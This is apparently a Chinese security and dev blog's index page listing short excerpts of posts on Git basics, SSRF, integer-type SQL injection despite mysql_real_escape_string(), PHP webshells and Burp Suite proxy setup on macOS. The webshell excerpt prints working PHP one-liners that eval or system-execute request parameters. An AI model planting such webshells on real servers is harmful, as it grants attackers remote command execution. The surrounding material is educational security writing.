摘要:
目录Git的三个空间的认识分支 Git定义: Git可以类比为一个本地文件管理工具,它可以记录文件夹中每个文件每次编辑记录,当然它可以更多结合着远程仓库一起操作,对本地和远程仓库一起管理,达到最好效果。 Git的三个空间的认识 Git命令都很简单,也就十多个常用命令,但是它包含不同空间,不同空间有不 阅读全文
posted @ 2020-03-26 22:59
Mysticbinary
阅读(363)
评论(0)
推荐(0)
摘要:
什么是SSRF 一个对外的Web接口,改接口能让用户控制curl命令,去访问别的web服务。 简图如下 想象一下当用户请求的baidu.com/x.php?image=google.com/1.jpg 改成 baidu.com/x.php?image=private.com/php.info,是不是 阅读全文
posted @ 2020-03-26 22:51
Mysticbinary
阅读(740)
评论(0)
推荐(0)
摘要:
目录mysql_real_escape_string()用法案例 类似PHP语言的 mysql_real_escape_string() 的函数,在用来防范SQL注入的时候,可能会遇到int型注入成功的情况。 mysql_real_escape_string()用法 mysql_real_escap 阅读全文
posted @ 2020-03-26 22:46
Mysticbinary
阅读(1038)
评论(0)
推荐(0)
摘要:
基础类 很容易被扫描、检测出来 <?php @eval($_GET['phpcode']);?> <?php @eval($_POST['phpcode']);?> <?php @system($_GET['cmd']);?> <?php @system($_POST['cmd']);?> <?ph 阅读全文
posted @ 2020-03-26 22:41
Mysticbinary
阅读(477)
评论(0)
推荐(0)
摘要:
目录下载证书mac OS导入证书Chrome设置代理Safari设置代理 下面的操作基于Mac OS Catalina(v10.15.3),抓包拦截工具基于Burp Suite v2.1.05。 下载证书 将Burp Suite 的证书下载到本地任意一个路径下。如果使用其它抓包工具,自行搜索一下。 阅读全文
posted @ 2020-03-26 21:53
Mysticbinary
阅读(5100)
评论(0)
推荐(2)
浙公网安备 33010602011771号